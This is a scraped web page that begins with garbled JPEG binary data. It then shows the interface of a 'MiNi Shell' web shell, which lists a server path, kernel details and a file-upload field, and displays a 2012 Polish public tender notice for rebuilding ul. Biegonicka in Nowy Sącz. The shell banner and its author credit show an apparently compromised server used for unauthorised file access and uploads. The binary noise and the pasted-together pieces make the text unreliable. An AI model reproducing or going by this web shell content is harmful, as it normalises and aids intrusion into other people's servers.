JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120619/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120619/132795-N-2012.html

<p class="kh_header"><b>Nowy Sącz: Przebudowa ul. Biegonickiej w Nowym Sączu wraz z kanałem opadowym- odcinek od ul. Węgierskiej</b><br>
<b>Numer ogłoszenia: 132795 - 2012; data zamieszczenia: 19.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski  Zarząd Dróg , ul. Wyspiańskiego 22, 33-300 Nowy Sącz, woj. małopolskie, tel. 18-4427967, faks 18 4427800.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzd.nowysacz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ul. Biegonickiej w Nowym Sączu wraz z kanałem opadowym- odcinek od ul. Węgierskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zakres robót obejmuje: 
Inwestycja polega na rozbudowie odcinka ul. Biegonickiej - jezdnia szerokości 6,0 m wraz z jednostronnym chodnikiem szerokości 2,0 m, bezpiecznikiem, zjazdami publicznymi i indywidualnymi, przebudowie istniejącego uzbrojenia terenu w zakresie niezbędnym do wykonania zadania oraz budowie kanalizacji deszczowej dla odwodnienia drogi.
Parametry funkcjonalno-użytkowe drogi:
-	klasa Z;
-	prędkość projektowa vp=50km/h;
-	kategoria ruchu KR-4;
-	długość trasy 582m;
-	szerokość pasa ruchu 3,00m;
-	szerokość jezdni 6,00m;
-	szerokość pozostałych elementów: 
-lewostronny chodnik o szerokości 2,00m oraz prawostronny bezpiecznik o szerokości 0,50m 
-szerokość zjazdów indywidualnych dostosowana do zjazdów istniejących
-	pochylenie poprzeczne jezdni na  odcinku prostym 2%;
-	pochylenia podłużne niwelety:
-maksymalne 3,48%;
-minimalne 0,55%;
-	promienie łuków poziomych:
-maksymalny R=220m;
-minimalny R=120m;
-	promienie łuków pionowych:
-maksymalny R=3000m;
-minimalny R=800m.
Droga ma przekrój uliczny z lewostronnym chodnikiem przyległym do jezdni szerokości 2,00m oraz prawostronnym bezpiecznikiem szerokości 0,5m. Szerokość jezdni 6,00m. Krawędzie jezdni wyznaczone są poprzez krawężniki.
W miejscach przebudowywanych zjazdów i przejścia dla pieszych krawężniki zostaną obniżone na wysokość 2 cm.
W miejscach przebiegu drogi w wykopie zastosowano korytka przyskarpowe przylegające do chodnika lub bezpiecznika.
Wzdłuż planowanego do remontu odcinka drogi, ze względu na poszerzenie korony drogi w stosunku do stanu istniejącego zajdzie konieczność rozbiórki budynku oznaczonego nr 247 oraz istniejących ogrodzeń.  
Po prawej stronie jezdni planuje się rozbiórkę ogrodzeń przy budynkach nr: 247,3, 8A,28 i 140.
Po lewej stronie ogrodzenie będzie rozebrane przy budynkach nr 35, 33, 31, 25,15,13, 11, 9, 7, 5 i 1.
Łącznie przewiduje się ok. 470 m ogrodzeń do rozbiórki. Zniszczone ogrodzenia zostaną odbudowane przez wykonawcę drogi lub przez właścicieli posesji.
Odwodnienie projektowanej drogi zapewnione będzie przez jej pochylenia podłużne i poprzeczne oraz projektowane urządzenia odwadniające. Wody opadowe zostaną ujęte z korpusu drogowego grawitacyjnym systemem kanalizacji deszczowej i odprowadzone po podczyszczeniu do odbiornika - potoku Szczubanowskiego, będącego prawostronnym dopływem rzeki Poprad. Wzdłuż drogi prowadzone będą korytka betonowe przyskarpowe otwarte ujmujące wody napływające z sąsiadującego terenu w kierunku korpusu drogowego. Woda z korytek betonowych ujmowana będzie do wpustów drogowych i odprowadzana do kanalizacji deszczowej.
W km 0+166,50 po lewej stronie drogi zaprojektowano mur oporowy z gruntu zbrojonego. Mur należy wykonać na ławie betonowej 05x0,25m, z betonu B25. Ze względu na duży spadek podłużny terenu poziom posadowienia ławy jest zmienny. Ze względu na istniejące warunki gruntowe zaprojektowano posadowienie na gruncie wzmocnionym podwójnym materacem geosyntetycznym (kruszywo łamane stabilizowane mechanicznie, georuszt trójosiowy). Materac z kruszywa można zastąpić poprzez wykonanie stabilizacji gruntu cementem. 
Po wykorytowaniu na gruncie rodzimym należy uzyskać nośność określoną wtórnym modułem odkształcenia E2=20MPa. Na materacu geosyntetycznym lub gruncie stabilizowanym cementem nośność powinna wynosić E2=80MPa.
W miejscu zbliżenia przebudowywanej drogi do potoku Szczubanowskiego, w kilometrze od 0+505 do 0+538, skarpę zabezpieczono za pomocą gabionów.
Gabion o wymiarach 100×200×100cm wykonany jest z koszy siatkowych prostopadłościennych, wypełnionych materiałem kamiennym.
W pasie planowanej inwestycji oraz w jej sąsiedztwie znajdują się urządzenia infrastruktury technicznej, m.in.:
- sieci wodociągowe,
- sieci i urządzenia kanalizacji deszczowej, 
- sieci gazowe,
- kable teletechniczne
- linie napowietrzne teletechniczne,
- linie napowietrzne energetyczne,
- oświetlenie uliczne.
Sieci znajdujące się na trasie projektowanej drogi zostaną przebudowane lub zabezpieczone, zgodnie z uzyskanymi warunkami.
Zestawienie powierzchni:
- powierzchnia w liniach rozgraniczających: 6 899 m2 
- powierzchnia użytkowa: 5 406 m2 
w tym:
- jezdnia: 3 760 m2
- jezdnia zatoki autobusowej: 111m2
- chodnik i bezpiecznik: 1 240 m2
- zjazdy: 295 m2
- krawężnik betonowy: 960 m
- krawężnik obniżony: 232 m
- obrzeże betonowe: 1 166 m
- korytko betonowe: 565 m
- korytko betonowe na zjazdach: 55 m
Konstrukcja jezdni:
Warstwa ścieralna z betonu asfaltowego AC11S 
wg PN-EN 13108 i WT-2	5 cm
Warstwa wiążąca z betonu asfaltowego AC16W 
wg PN-EN 13108 i WT-2	6 cm
Podbudowa zasadnicza z betonu asfaltowego AC22P 
wg PN-EN 13108 i WT-2	7 cm
Podbudowa pomocnicza z kruszywa łamanego 0/31,5 stabilizowanego mechanicznie wg PN-S 06102	20 cm
Warstwa mrozoochronna z kruszywa łamanego 0/63 stabilizowanego mechanicznie wg PN-S 06102	35 cm
Wymagane są następujące parametry:
Wskaźnik zagęszczenia Is=1,03
Wtórny moduł odkształcenia E2=120 MPa
Podłoże gruntowe doprowadzić do grupy nośności G1 poprzez wykonanie warstwy gruntu stabilizowanego cementem (RM=2,5MPa). Grubość warstwy  należy określić na podstawie poletka doświadczalnego.
Konstrukcja chodnika i bezpiecznika:
Brukowa kostka betonowa 	8 cm
Podsypka cementowo-piaskowa 1:4	5 cm
Podbudowa z kruszywa łamanego 0/31,5 stabilizowanego mechanicznie wg PN-S 06102	15 cm
Warstwa odcinająca z piasku wg PN-S 06102	10 cm
Konstrukcja zjazdów:
Brukowa kostka betonowa 	8 cm
Podsypka cementowo-piaskowa 1:4	5 cm
Podbudowa z kruszywa łamanego lub naturalnego 0/31,5 stabilizowanego mechanicznie wg PN-S 06102	25 cm
Warstwa odcinająca z piasku wg PN-S 06102
Kanalizacja deszczowa.	10 cm
W stanie istniejącym wody deszczowe odprowadzane są do istniejącej  kanalizacji deszczowej oraz do rowów przydrożnych. W ramach inwestycji zaprojektowano nową kanalizację deszczową wraz z odprowadzeniem wód deszczowych za pomocą wylotu do potoku Szczubanowskiego.
Odprowadzenie wód opadowych z powierzchni drogi oraz chodników zaprojektowano systemem grawitacyjnym do sieci wykonanej z rur kanalizacyjnych z PE100 SN8 o średnicach Dz200-Dz400. Projektowane przewody kanalizacji deszczowej będą odprowadzały ścieki deszczowe z terenu inwestycji  w kierunku projektowanego wylotu kanalizacji deszczowej do potoku Szczubanowskiego.
Wody opadowe przed wprowadzeniem do odbiornika, oczyszczane będą w koalescencyjnym separatorze substancji ropopochodnych o parametrach:
- przepustowość nominalna  15 [l/s]
- przepustowość maksymalna  150 [l/s]
- średnica 2000[mm]
- wysokość 2760[mm]
- średnica dopływu 400[mm] 
- średnica odpływu 400[mm]
Kanalizację deszczową zaprojektowano z rur  PE100 o średnicach Dz200 - Dz400.
Projektuje się studzienki kanalizacyjne o średnicy Dn1200mm z prefabrykowanych kręgów żelbetowych, z zastosowaniem jako materiału betonu odpowiadającego klasie wytrzymałości nie niższej niż B-45 (C35/45 - wg PN-EN-206-1), wodoszczelnego (W8), mało nasiąkliwego (nw do 5%) i mrozoodpornego (F-150). Elementy studni należy łączyć z zastosowaniem uszczelek. 
Części denne studni należy wykonać jako monolityczne. Studnie przykryć płytą żelbetową pokrywową oraz zabudować właz kanałowy fi 600 wg PN-EN-124:2000: klasy D400 kN.
W przypadku lokalizacji studni w jezdni należy zastosować krąg odciążający. Włazy kanalizacyjne posadowić zlicowane z poziomem ulic i chodników, w trawnikach właz posadowić min. 8 cm powyżej terenu. 
Przejścia rur przez ściany studzienek rewizyjnych wykonać jako szczelne z zastosowaniem tulei ochronnej. Zwraca się uwagę na dokładne obsypanie studni rewizyjnych piaskiem z dokładnym zagęszczeniem przy pomocy ubijaków mechanicznych.
Wzdłuż planowanego do przebudowy odcinka drogi występuje głównie zieleń urządzona. Ze wglądu na niewątpliwą konieczność zwiększenia szerokości korony drogi przewiduje się konieczność wycinki drzew i krzewów oraz fragmenty żywopłotów.
Po lewej stronie drogi od budynku nr 41 do 39 znajduje się o długości około 50 m żywopłot świerkowy w tym dwie lipy i dwie sosny rosnące bezpośrednio przy linii asfaltu i konieczne może być jego wydzielenie i zabezpieczenie korzeni w czasie wykonywania prac.
Na wysokości budynku nr 33, po lewej stronie drogi, rośnie szpaler drzew. Długość szpaleru to około 8 m, odległość od drogi 2,5 m. Szpaler oddzielony jest rowem przydrożnym. Rośnie tutaj:
-Świerk pospolity - 2 szt., wysokość około 4m,
-Sosna zwyczajna- 3 szt., wysokość około 5m.
Konieczna będzie wycinka tych drzew ze względu na projektowane zagospodarowanie.
Żywopłot świerkowy znajduje się również po lewej stronie na wysokości budynku nr 33, on również jest przeznaczony do wycinki.
Po prawej stronie jezdni w km 0+220 na skarpie w odległości ok. 3m od drogi rośnie szpaler wierzby kruchej, leszczyna pospolita i śliwa. Wykopy w pobliżu należy wykonywać ręcznie a drzewa zabezpieczyć.
Od km 0+240 do km 0+290 po prawej stronie gatunki takie jak: lipa drobnolistna, wierzba krucha, leszczyna pospolita należy wyciąć ze względu na zmianę przebiegu drogi. W dalszej części do km ok. 0+330 drzewa należy w miarę możliwości zabezpieczyć przed uszkodzeniem korzeni lub pnia. Jeżeli drzewa kolidować będą z projektowanym korytkiem betonowym lub bezpiecznikiem należy je wyciąć.
Na wysokości budynku nr 140 projektowane jest wzmocnienie skarpy potoku Szczubanowskiego za pomocą gabionów. W związku z tym gatunki kolidujące z zabezpieczeniem jak  wierzba krucha, klon jawor, olsza czarna, jesion wyniosły czy klon jawor należy wyciąć.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienie uzupełniające nie przekracza 50% zamówienia podstawowego i było przewidziane w ogłoszeniu dla zamówienia podstawowego i jest zgodne z jego przedmiotem</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.24.10-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 75 000 zł (słownie: siedemdziesiąt pięć tysięcy złotych 00/100 ) - nie później niż w terminie składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Pod uwagę będą brane oferty wykonawców którzy w ciągu 5 ostatnich lat wykonali zgodnie z zasadami sztuki budowlanej i prawidłowo ukończyli przynajmniej 2 zamówienia swoim rodzajem i wartością odpowiadające przedmiotowi zamówienia, polegające na budowie, przebudowie, remoncie ulicy, drogi</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Pod uwagę będą brane oferty wykonawców którzy dysponują niezbędnymi do wykonania zamówienia narzędziami, wyposażeniem zakładu i urządzeniami technicznymi:
-WMB min. 100Mg/h lub zapewnienie dostawy betonu asfaltowego z wytwórni położonej w uzasadnionej technologicznie odległości - należy podać lokalizację WMB
-spycharka gąsienicowa 
-koparka gąsienicowa 
-równiarka samojezdna
-walec samojezdny wibracyjny
-walec samojezdny statyczny
-walec samojezdny ogumiony
-rozkładarka mas bitumicznych sterowana elektronicznie
-sprężarka powietrza
-zagęszczarka wibracyjna
-samochód samowyładowczy
-frezarka o szerokości min. 2,00 m</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Pod uwagę będą brane oferty wykonawców dysponujących osobami zdolnymi do wykonania zamówienia tj. uprawnionych do sprawowania funkcji: 
1.	kierownik budowy robót drogowych
2.	kierownik robót sieci kanalizacyjnych i wodociągowych
3.	kierownik robót sieci gazowych
4.	kierownik robót sieci teletechnicznych i energetycznych 
posiadający uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie o których mowa w ustawie Prawo budowlane oraz legitymujący się dokumentami potwierdzającymi przynależność do właściwej izby samorządu zawodowego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Pod uwagę będą brane oferty wykonawców którzy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku wystąpienia następujących warunków:
a.	ograniczenia/rezygnacji lub zwiększenia zakresu robót na warunkach opisanych w projekcie umowy,
b.	konieczności przedłużenia terminu wykonania umowy z powodu konieczności zmiany terminu w przypadku wystąpienia tzw. siły wyższej tj. wyjątkowego zdarzenia lub okoliczności, warunków atmosferycznych uniemożliwiających zachowanie technologii wykonania robót a także w przypadku wystąpienia robót dodatkowych, koniecznych do wykonania podstawowego zakresu zadania oraz konieczności wprowadzenia zmian ilościowych do przedmiaru robót na skutek sytuacji niemożliwej wcześniej do przewidzenia, zmian technologii wykonania robót lub zmiany materiałów, jeżeli nowe rozwiązania będą korzystne dla Zamawiającego, przy zachowaniu niepogorszonych standardów jakościowych, konieczności wykonania prac wynikających z zaleceń organów administracji architektoniczno-budowlanej np. nadzoru budowlanego, PIP, Konserwatora Zabytków itp. wydanych stosownie do ich właściwości,
c.	zmiana danych podmiotowych dotyczących kierownika budowy i robót na osoby o takich samych lub wyższych kwalifikacjach, zmiana danych podmiotowych dotyczących inspektora nadzoru,
d.	zmiana podwykonawcy oraz zmiana zakresu zamówienia powierzonego podwykonawcy, jeżeli zmiana będzie korzystna dla Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzd.nowysacz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Dróg
Nowy Sącz ul.Wyspiańskiego 22,III piętro,pokój nr 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.07.2012 godzina 10:00, miejsce: Miejski Zarząd Dróg
Nowy Sącz ul.Wyspiańskiego 22,III piętro,sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com